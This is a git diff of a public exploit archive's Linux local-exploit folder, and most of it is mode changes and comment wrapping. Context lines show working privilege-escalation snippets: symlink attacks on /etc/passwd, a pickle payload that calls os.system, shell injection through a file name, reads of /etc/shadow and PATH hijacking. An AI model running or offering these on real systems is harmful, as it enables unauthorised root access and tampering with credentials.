The monitor -f command line option may be used by a local attacker to cause an arbitrary system file to be overwritten. Once overwritten, the attacker will gain ownership of the file. -monitor -f /etc/passwd \ No newline at end of file +monitor -f /etc/passwd \ No newline at end of file diff --git a/platforms/linux/local/21501.txt b/platforms/linux/local/21501.txt old mode 100755 new mode 100644 index 35b08c418..dfe791fc2 --- a/platforms/linux/local/21501.txt +++ b/platforms/linux/local/21501.txt @@ -24,4 +24,4 @@ $ passwd keeping the modifications you have made. $ su -# \ No newline at end of file +# \ No newline at end of file diff --git a/platforms/linux/local/21502.txt b/platforms/linux/local/21502.txt old mode 100755 new mode 100644 index b54b2c731..1eaabe362 --- a/platforms/linux/local/21502.txt +++ b/platforms/linux/local/21502.txt @@ -8,4 +8,4 @@ $su > /dev/null & $kill -SEGV `ps -A | grep su | awk {'print $1'}` $strings /var/dumps/su.core | grep ":0:0" > /tmp/mypasswd -The attacker has effectively obtained a copy of the root user's password hash. \ No newline at end of file +The attacker has effectively obtained a copy of the root user's password hash. \ No newline at end of file diff --git a/platforms/linux/local/21505.c b/platforms/linux/local/21505.c old mode 100755 new mode 100644 index a6945844f..8d84ea941 --- a/platforms/linux/local/21505.c +++ b/platforms/linux/local/21505.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/4917/info The QNX phlocale utility is prone to an exploitable buffer overflow condition. This is due to insufficient bounds checking of the ABLANG environment variable. Exploitation of this issue may result in execution of arbitrary attacker-supplied instructions as root. +*/ /* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell. * If it doesnt work for you, then you most likely need to change diff --git a/platforms/linux/local/21506.c b/platforms/linux/local/21506.c old mode 100755 new mode 100644 index 3d9c6b149..97ec0dddf --- a/platforms/linux/local/21506.c +++ b/platforms/linux/local/21506.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/4918/info It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition. The vulnerability is a result of an unbounded string copy of the argument to the "-U" commandline option of pkg-installer to a local buffer. +*/ /* Quick and dirty QNX pkg-installer root exploit. * The shellcode sucks, it is longer than it has diff --git a/platforms/linux/local/21538.c b/platforms/linux/local/21538.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21568.c b/platforms/linux/local/21568.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21585.c b/platforms/linux/local/21585.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/216.c b/platforms/linux/local/216.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21623.txt b/platforms/linux/local/21623.txt old mode 100755 new mode 100644 index 86d60b16c..40034f93c --- a/platforms/linux/local/21623.txt +++ b/platforms/linux/local/21623.txt @@ -6,4 +6,4 @@ A vulnerability has been reported in the Pickle implementation included with som Exploitation of this vulnerability will be highly dependent on a specific Python application which accepts a "pickle" string from an untrusted source. This behavior has been reported in some implementations of the Python SmartCookie class. -"S''*__import__('os').system('echo 0wn3d')\np0\n." \ No newline at end of file +"S''*__import__('os').system('echo 0wn3d')\np0\n." \ No newline at end of file diff --git a/platforms/linux/local/21624.py b/platforms/linux/local/21624.py index a37e6ee47..086200e9a 100755 --- a/platforms/linux/local/21624.py +++ b/platforms/linux/local/21624.py @@ -22,4 +22,4 @@ print repr(t) # Now, load the pickle -- creates the file /tmp/python-is-buggy (by calling # the builtin open() function, then raises an exception. But the damage is # done... -pickle.loads(t) \ No newline at end of file +pickle.loads(t) \ No newline at end of file diff --git a/platforms/linux/local/21666.txt b/platforms/linux/local/21666.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21667.c b/platforms/linux/local/21667.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21674.c b/platforms/linux/local/21674.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21683.c b/platforms/linux/local/21683.c old mode 100755 new mode 100644 index eb8deb7c0..997883456 --- a/platforms/linux/local/21683.c +++ b/platforms/linux/local/21683.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/5404/info The qmailadmin utility, developed by Inter7, is vulnerable to a buffer overflow condition. It is meant to run as a CGI program and is typically installed setuid (owned by root on some systems, regular users on others). qmailadmin fails to implement adequate bounds checking when processing an environment variable, resulting in a buffer overrun condition. It is likely that this can be exploited by malicious local users to elevate privileges. +*/ /* http://www.badc0ded.com (bug found by Thomas Cannon) / bash-2.05a$ ./qmailadmin-exp diff --git a/platforms/linux/local/217.c b/platforms/linux/local/217.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21700.c b/platforms/linux/local/21700.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21732.txt b/platforms/linux/local/21732.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21761.c b/platforms/linux/local/21761.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21762.c b/platforms/linux/local/21762.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21763.txt b/platforms/linux/local/21763.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21793.txt b/platforms/linux/local/21793.txt old mode 100755 new mode 100644 index 8f763c894..f8dd69117 --- a/platforms/linux/local/21793.txt +++ b/platforms/linux/local/21793.txt @@ -6,4 +6,4 @@ xbru does not properly check for the existence of temporary files prior to execu ln -s /tmp/clobber /tmp/xbru_dscheck.dd -ln -s /etc/log.d/scripts/logfiles/xferlog/'`cd etc;chmod 666 passwd #`' /tmp/xbru_dscheck.dd \ No newline at end of file +ln -s /etc/log.d/scripts/logfiles/xferlog/'`cd etc;chmod 666 passwd #`' /tmp/xbru_dscheck.dd \ No newline at end of file diff --git a/platforms/linux/local/218.c b/platforms/linux/local/218.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21814.c b/platforms/linux/local/21814.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21865.c b/platforms/linux/local/21865.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21871.c b/platforms/linux/local/21871.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21872.c b/platforms/linux/local/21872.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/219.c b/platforms/linux/local/219.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/2193.php b/platforms/linux/local/2193.php old mode 100755 new mode 100644 diff --git a/platforms/linux/local/21980.c b/platforms/linux/local/21980.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22002.txt b/platforms/linux/local/22002.txt old mode 100755 new mode 100644 index 3108b5f97..c3d3c045f --- a/platforms/linux/local/22002.txt +++ b/platforms/linux/local/22002.txt @@ -29,4 +29,4 @@ The packager will ask a number of questions. When the procedure is complete, a root shell will be waiting for the attacker: $ ls -l /tmp/sh -- -rwsr-x r-x 1 root 100 153908 May 11 05:36 /tmp/sh \ No newline at end of file +- -rwsr-x r-x 1 root 100 153908 May 11 05:36 /tmp/sh \ No newline at end of file diff --git a/platforms/linux/local/22014.c b/platforms/linux/local/22014.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22055.txt b/platforms/linux/local/22055.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22066.c b/platforms/linux/local/22066.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/221.c b/platforms/linux/local/221.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22128.c b/platforms/linux/local/22128.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22189.txt b/platforms/linux/local/22189.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22190.txt b/platforms/linux/local/22190.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/222.c b/platforms/linux/local/222.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22212.txt b/platforms/linux/local/22212.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22233.c b/platforms/linux/local/22233.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22234.c b/platforms/linux/local/22234.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22320.c b/platforms/linux/local/22320.c old mode 100755 new mode 100644 index 1d2ee16d4..613c3d609 --- a/platforms/linux/local/22320.c +++ b/platforms/linux/local/22320.c @@ -212,4 +212,4 @@ void usage(char *cmd) "__options\n" " -h\t- this help\n" " -t num\t- choose target (0 for list)\n\n", cmd); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/22321.c b/platforms/linux/local/22321.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22322.c b/platforms/linux/local/22322.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22323.c b/platforms/linux/local/22323.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22326.c b/platforms/linux/local/22326.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22340.txt b/platforms/linux/local/22340.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22344.txt b/platforms/linux/local/22344.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22362.c b/platforms/linux/local/22362.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22363.c b/platforms/linux/local/22363.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22376.txt b/platforms/linux/local/22376.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22452.sh b/platforms/linux/local/22452.sh index db438c182..e74f1be08 100755 --- a/platforms/linux/local/22452.sh +++ b/platforms/linux/local/22452.sh @@ -14,4 +14,4 @@ cd /tmp export PATH="/tmp:$PATH" /usr/local/bin/chaddpfbname /tmp/.sh -c id -/tmp/.sh \ No newline at end of file +/tmp/.sh \ No newline at end of file diff --git a/platforms/linux/local/22456.txt b/platforms/linux/local/22456.txt old mode 100755 new mode 100644 index bf0dae912..800b7a990 --- a/platforms/linux/local/22456.txt +++ b/platforms/linux/local/22456.txt @@ -7,4 +7,4 @@ $ ln -s /usr/local/apache/cgi-bin/webc.cgi webc.cgi $ cp /usr/local/apache/cgi-bin/webc.emf . $ echo "WEBC_NO_SECURITY_CHECK=True" > webc.ini $ echo "HTML_TRACE_REQUEST=/tmp/.debug1" >> webc.ini -$ ./webc.cgi \ No newline at end of file +$ ./webc.cgi \ No newline at end of file diff --git a/platforms/linux/local/22458.c b/platforms/linux/local/22458.c old mode 100755 new mode 100644 index 01caa8be0..93e05626b --- a/platforms/linux/local/22458.c +++ b/platforms/linux/local/22458.c @@ -178,5 +178,4 @@ int main(int argc, char **argv) } close(fd_b); -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/22540.c b/platforms/linux/local/22540.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22565.c b/platforms/linux/local/22565.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22567.c b/platforms/linux/local/22567.c old mode 100755 new mode 100644 index d5e1f4dc5..67943c028 --- a/platforms/linux/local/22567.c +++ b/platforms/linux/local/22567.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/7505/info Multiple vulnerabilities have been reported for Leksbot. The precise nature of these vulnerabilities are currently unknown however, exploitation of this issue may result in an attacker obtaining elevated privileges. This is because in some installations, the Leksbot binary may be installed setuid. +*/ /* by gunzip * KATAXWR/leksbot local root exploit diff --git a/platforms/linux/local/22594.c b/platforms/linux/local/22594.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22617.c b/platforms/linux/local/22617.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22633.c b/platforms/linux/local/22633.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22640.c b/platforms/linux/local/22640.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22644.c b/platforms/linux/local/22644.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22645.c b/platforms/linux/local/22645.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22703.c b/platforms/linux/local/22703.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22720.c b/platforms/linux/local/22720.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22729.c b/platforms/linux/local/22729.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22745.c b/platforms/linux/local/22745.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22748.c b/platforms/linux/local/22748.c old mode 100755 new mode 100644 index dba07a244..5f9b7eacd --- a/platforms/linux/local/22748.c +++ b/platforms/linux/local/22748.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/7838/info It has been reported that Xaos is vulnerable to a boundary condition error in the command option processing. Because of this, an attacker may be able to gain elevated privileges, potentially compromising the integrity of the host. +*/ /* xaos <= 3.0-23 ? 0day local root xploit on debian 3.0 whoody */ diff --git a/platforms/linux/local/22773.c b/platforms/linux/local/22773.c old mode 100755 new mode 100644 index 9fdc3de14..5f7a58510 --- a/platforms/linux/local/22773.c +++ b/platforms/linux/local/22773.c @@ -23,4 +23,4 @@ setgid(0); printf("bullshit library loaded\n"); system("/usr/bin/id > /tmp/p00p"); system("cat /tmp/p00p"); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/22775.txt b/platforms/linux/local/22775.txt old mode 100755 new mode 100644 index bb528549f..d6a3284dd --- a/platforms/linux/local/22775.txt +++ b/platforms/linux/local/22775.txt @@ -15,4 +15,4 @@ $>/usr/bin/Wnn4/wddel -D localhost -n ' > shutdown:*:12146:0:99999:7::: > halt:*:12146:0:99999:7::: > ' -d 123 -$>su - \ No newline at end of file +$>su - \ No newline at end of file diff --git a/platforms/linux/local/22781.txt b/platforms/linux/local/22781.txt old mode 100755 new mode 100644 index a71d9973f..f40ac88a2 --- a/platforms/linux/local/22781.txt +++ b/platforms/linux/local/22781.txt @@ -24,4 +24,4 @@ root $ su - # id uid=0(root) gid=0(root) -groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) \ No newline at end of file +groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) \ No newline at end of file diff --git a/platforms/linux/local/22813.c b/platforms/linux/local/22813.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22815.c b/platforms/linux/local/22815.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22840.c b/platforms/linux/local/22840.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22847.txt b/platforms/linux/local/22847.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22860.c b/platforms/linux/local/22860.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22861.c b/platforms/linux/local/22861.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22862.c b/platforms/linux/local/22862.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22863.c b/platforms/linux/local/22863.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22884.c b/platforms/linux/local/22884.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/229.c b/platforms/linux/local/229.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22943.c b/platforms/linux/local/22943.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22965.c b/platforms/linux/local/22965.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22971.txt b/platforms/linux/local/22971.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22979.txt b/platforms/linux/local/22979.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22984.c b/platforms/linux/local/22984.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22985.c b/platforms/linux/local/22985.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22993.txt b/platforms/linux/local/22993.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/22996.c b/platforms/linux/local/22996.c old mode 100755 new mode 100644 index 7bcc6cb11..ca4d5b9d1 --- a/platforms/linux/local/22996.c +++ b/platforms/linux/local/22996.c @@ -86,4 +86,4 @@ Cypher\n"); putenv(e); execl(PATH,"xpcd",NULL); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/dos/23045.pl b/platforms/linux/local/23045.pl similarity index 57% rename from platforms/linux/dos/23045.pl rename to platforms/linux/local/23045.pl index 8433c9fe7..85041671c 100755 --- a/platforms/linux/dos/23045.pl +++ b/platforms/linux/local/23045.pl @@ -1,6 +1,6 @@ -source: http://www.securityfocus.com/bid/8462/info - -Various potential security vulnerabilities have been reported for ViRobot Linux Server. Problems are said to occur within various setuid binaries installed by the program. Reports indicate that some of these binaries may be prone to buffer overruns, potentially making them exploitable to execute arbitrary code with elevated privileges. +#source: http://www.securityfocus.com/bid/8462/info +# +#Various potential security vulnerabilities have been reported for ViRobot Linux Server. Problems are said to occur within various setuid binaries installed by the program. Reports indicate that some of these binaries may be prone to buffer overruns, potentially making them exploitable to execute arbitrary code with elevated privileges. #!/usr/bin/perl -w # virobot freebsd edition, might need tweaking but works on my 4.8-RELEASE. diff --git a/platforms/linux/local/23119.c b/platforms/linux/local/23119.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23126.c b/platforms/linux/local/23126.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23154.c b/platforms/linux/local/23154.c old mode 100755 new mode 100644 index 2ce6197a8..c28a2ac41 --- a/platforms/linux/local/23154.c +++ b/platforms/linux/local/23154.c @@ -117,4 +117,4 @@ main(int argv, char **argc) printf("%s\n", c); arg[1] = xp_evilstring(got, retloc); execve(sendmail,arg,NULL); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/23189.c b/platforms/linux/local/23189.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23197.c b/platforms/linux/local/23197.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23204.c b/platforms/linux/local/23204.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23223.c b/platforms/linux/local/23223.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23228.c b/platforms/linux/local/23228.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23251.txt b/platforms/linux/local/23251.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23258.c b/platforms/linux/local/23258.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23297.c b/platforms/linux/local/23297.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23299.c b/platforms/linux/local/23299.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23300.c b/platforms/linux/local/23300.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23301.c b/platforms/linux/local/23301.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23303.c b/platforms/linux/local/23303.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23308.c b/platforms/linux/local/23308.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23344.txt b/platforms/linux/local/23344.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23345.txt b/platforms/linux/local/23345.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23346.txt b/platforms/linux/local/23346.txt old mode 100755 new mode 100644 index 373b61eca..b802b685d --- a/platforms/linux/local/23346.txt +++ b/platforms/linux/local/23346.txt @@ -15,4 +15,4 @@ Segmentation fault db2govd: GOV1005N No governor for database "BFFFD788" on node "b" is running, or it is already being stopped. [db2inst1@RiotStarter adm]$ ./db2govd stop %n%n%n b -Segmentation fault \ No newline at end of file +Segmentation fault \ No newline at end of file diff --git a/platforms/linux/local/23350.c b/platforms/linux/local/23350.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23351.c b/platforms/linux/local/23351.c old mode 100755 new mode 100644 index 089da31a0..84e09c702 --- a/platforms/linux/local/23351.c +++ b/platforms/linux/local/23351.c @@ -135,5 +135,4 @@ int main(int argc, char *argv[]) { setenv("LADSPA_PATH",buff,1); execl(BINARY, BINARY, NULL); perror("execl"); -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/23352.c b/platforms/linux/local/23352.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/2338.c b/platforms/linux/local/2338.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23414.txt b/platforms/linux/local/23414.txt old mode 100755 new mode 100644 index 0f96210f0..ae508917d --- a/platforms/linux/local/23414.txt +++ b/platforms/linux/local/23414.txt @@ -8,4 +8,4 @@ $ touch ' > Exec xmessage "0wn3d" > > ' -$ write fvwmguy <<< "k3wl mp3 in `pwd` OMG LOLOLOL!!!1111" \ No newline at end of file +$ write fvwmguy <<< "k3wl mp3 in `pwd` OMG LOLOLOL!!!1111" \ No newline at end of file diff --git a/platforms/linux/local/23481.c b/platforms/linux/local/23481.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23482.c b/platforms/linux/local/23482.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23510.c b/platforms/linux/local/23510.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23634.c b/platforms/linux/local/23634.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23658.c b/platforms/linux/local/23658.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23674.txt b/platforms/linux/local/23674.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23682.c b/platforms/linux/local/23682.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23738.c b/platforms/linux/local/23738.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23740.c b/platforms/linux/local/23740.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23743.txt b/platforms/linux/local/23743.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23849.txt b/platforms/linux/local/23849.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23882.pas b/platforms/linux/local/23882.pas old mode 100755 new mode 100644 diff --git a/platforms/linux/local/23892.c b/platforms/linux/local/23892.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24027.txt b/platforms/linux/local/24027.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/2404.c b/platforms/linux/local/2404.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24043.c b/platforms/linux/local/24043.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24141.txt b/platforms/linux/local/24141.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24182.c b/platforms/linux/local/24182.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24278.sh b/platforms/linux/local/24278.sh index cd268b605..f063cb9ac 100755 --- a/platforms/linux/local/24278.sh +++ b/platforms/linux/local/24278.sh @@ -7,4 +7,4 @@ The im-switch utility will write to this temporary file before verifying its exi An attacker may exploit this issue to corrupt arbitrary files. This corruption may potentially result in the elevation of privileges, or in a system wide denial of service. $ bash -c 'i=1;while [ $i -lt 65536 ]; do ln -s /etc/IMPORTANT_FILE -/tmp/imswitcher$i; let "i++"; done' \ No newline at end of file +/tmp/imswitcher$i; let "i++"; done' \ No newline at end of file diff --git a/platforms/linux/local/24398.sh b/platforms/linux/local/24398.sh index db78f90d8..34e84988e 100755 --- a/platforms/linux/local/24398.sh +++ b/platforms/linux/local/24398.sh @@ -27,4 +27,4 @@ echo > /tmp/imwheel.pid # rm /tmp/imwheel.pid # ln -s /etc/group /tmp/imwheel.pid -echo "Exploit Successful!!!" \ No newline at end of file +echo "Exploit Successful!!!" \ No newline at end of file diff --git a/platforms/linux/local/24406.txt b/platforms/linux/local/24406.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24421.c b/platforms/linux/local/24421.c old mode 100755 new mode 100644 index e526b37eb..67a392697 --- a/platforms/linux/local/24421.c +++ b/platforms/linux/local/24421.c @@ -13,4 +13,4 @@ Debian GNU/Linux computers with bsdmainutils versions prior to 6.0.15 are report Jun. 28<tab>Birthday of Steven Van Acker Aug. 19<tab>Birthday of Andrew Griffith -(where <tab> should be replaced by an actual Tab character) \ No newline at end of file +(where <tab> should be replaced by an actual Tab character) \ No newline at end of file diff --git a/platforms/linux/local/24458.txt b/platforms/linux/local/24458.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24570.txt b/platforms/linux/local/24570.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24606.c b/platforms/linux/local/24606.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24694.c b/platforms/linux/local/24694.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24750.c b/platforms/linux/local/24750.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24757.java b/platforms/linux/local/24757.java old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24758.java b/platforms/linux/local/24758.java old mode 100755 new mode 100644 diff --git a/platforms/linux/local/249.c b/platforms/linux/local/249.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/2492.s b/platforms/linux/local/2492.s old mode 100755 new mode 100644 diff --git a/platforms/linux/local/24933.txt b/platforms/linux/local/24933.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/25080.txt b/platforms/linux/local/25080.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/25106.c b/platforms/linux/local/25106.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/25134.c b/platforms/linux/local/25134.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/25202.c b/platforms/linux/local/25202.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/25288.c b/platforms/linux/local/25288.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/25289.c b/platforms/linux/local/25289.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/25406.sh b/platforms/linux/local/25406.sh index 1bc0a4094..d97f4f206 100755 --- a/platforms/linux/local/25406.sh +++ b/platforms/linux/local/25406.sh @@ -17,4 +17,4 @@ export CHECK_GID=0 export NON_RESIDENT=1 echo "unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT" >> /tmp/w00trc echo "/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' " > /tmp/lol -lxsuexec /tmp/lol \ No newline at end of file +lxsuexec /tmp/lol \ No newline at end of file diff --git a/platforms/linux/local/25444.c b/platforms/linux/local/25444.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/25450.c b/platforms/linux/local/25450.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/25688.txt b/platforms/linux/local/25688.txt old mode 100755 new mode 100644 index e1806a7e7..429bbe137 --- a/platforms/linux/local/25688.txt +++ b/platforms/linux/local/25688.txt @@ -20,4 +20,4 @@ bash-2.05b#gcc -o fk fmtexp.c bash-2.05b#mv fk AA%n%n%n.c -bash-2.05b#gedit AA%n%n%n.c \ No newline at end of file +bash-2.05b#gedit AA%n%n%n.c \ No newline at end of file diff --git a/platforms/linux/local/25707.txt b/platforms/linux/local/25707.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/25789.c b/platforms/linux/local/25789.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/2581.c b/platforms/linux/local/2581.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/25947.txt b/platforms/linux/local/25947.txt old mode 100755 new mode 100644 index 468ea26da..9194227d4 --- a/platforms/linux/local/25947.txt +++ b/platforms/linux/local/25947.txt @@ -15,4 +15,4 @@ pi3@darkstar:~$ ls -alh /usr/local/libexec/gnats/gen-index pi3@darkstar:~$ /usr/local/libexec/gnats/gen-index -n -o /etc/passwd pi3@darkstar:~$ ls -alh /etc/passwd -rw-r--r-- 1 root root 1 Jun 16 17:34 /etc/passwd -pi3@darkstar:~$ cat /etc/passwd \ No newline at end of file +pi3@darkstar:~$ cat /etc/passwd \ No newline at end of file diff --git a/platforms/linux/local/25993.sh b/platforms/linux/local/25993.sh index 9d11034dd..8c0a27c77 100755 --- a/platforms/linux/local/25993.sh +++ b/platforms/linux/local/25993.sh @@ -12,4 +12,4 @@ Skype 1.1.0.20 and prior versions are affected. terminal_number=`tty | cut -f4 -d '/'` user_ticket=$USER/$terminal_number:root -ln -s /var/run/sudo/$user_ticket /tmp/skype_profile.jpg \ No newline at end of file +ln -s /var/run/sudo/$user_ticket /tmp/skype_profile.jpg \ No newline at end of file diff --git a/platforms/linux/local/260.c b/platforms/linux/local/260.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/26195.txt b/platforms/linux/local/26195.txt old mode 100755 new mode 100644 index dc3badbe4..dc8b350e0 --- a/platforms/linux/local/26195.txt +++ b/platforms/linux/local/26195.txt @@ -6,4 +6,4 @@ This vulnerability allows local malicious users to gain access to the contents o QNX RTOS versions 6.1 and 6.3 are affected by this issue. Other versions are also likely affected. This issue is similar to the one described in BID 4901. -inputtrap -t /etc/shadow start \ No newline at end of file +inputtrap -t /etc/shadow start \ No newline at end of file diff --git a/platforms/linux/local/26218.txt b/platforms/linux/local/26218.txt old mode 100755 new mode 100644 index da27bdc20..641ff4614 --- a/platforms/linux/local/26218.txt +++ b/platforms/linux/local/26218.txt @@ -10,4 +10,4 @@ mq(/usr/local/sbin)-> frox -f /etc/master.passwd Unrecognised option "root:$2a$04$nR2msaB9.nAgR4qI6pqBNOQbH6LoqALZTmqsqhGEJLLwyTfsxXTd.:0:0::0:0:Charlie" at line 3 of /etc/master.passwd -Error reading configuration file \ No newline at end of file +Error reading configuration file \ No newline at end of file diff --git a/platforms/linux/local/26321.c b/platforms/linux/local/26321.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/26353.txt b/platforms/linux/local/26353.txt old mode 100755 new mode 100644 index f03b5ce70..69b8d0173 --- a/platforms/linux/local/26353.txt +++ b/platforms/linux/local/26353.txt @@ -7,4 +7,4 @@ Local users may modify the console keymap to include scripted macro commands. Th loadkeys <<EOF keycode 15 = F23 string F23 = "^V^C^V^Mecho hello world^V^M" -EOF \ No newline at end of file +EOF \ No newline at end of file diff --git a/platforms/linux/local/26492.txt b/platforms/linux/local/26492.txt old mode 100755 new mode 100644 index 57d2be882..5c5875277 --- a/platforms/linux/local/26492.txt +++ b/platforms/linux/local/26492.txt @@ -15,4 +15,4 @@ Emacs better than windoze. ;;; mode-name: #("Microsoft sux" 0 4 (display (when (eval 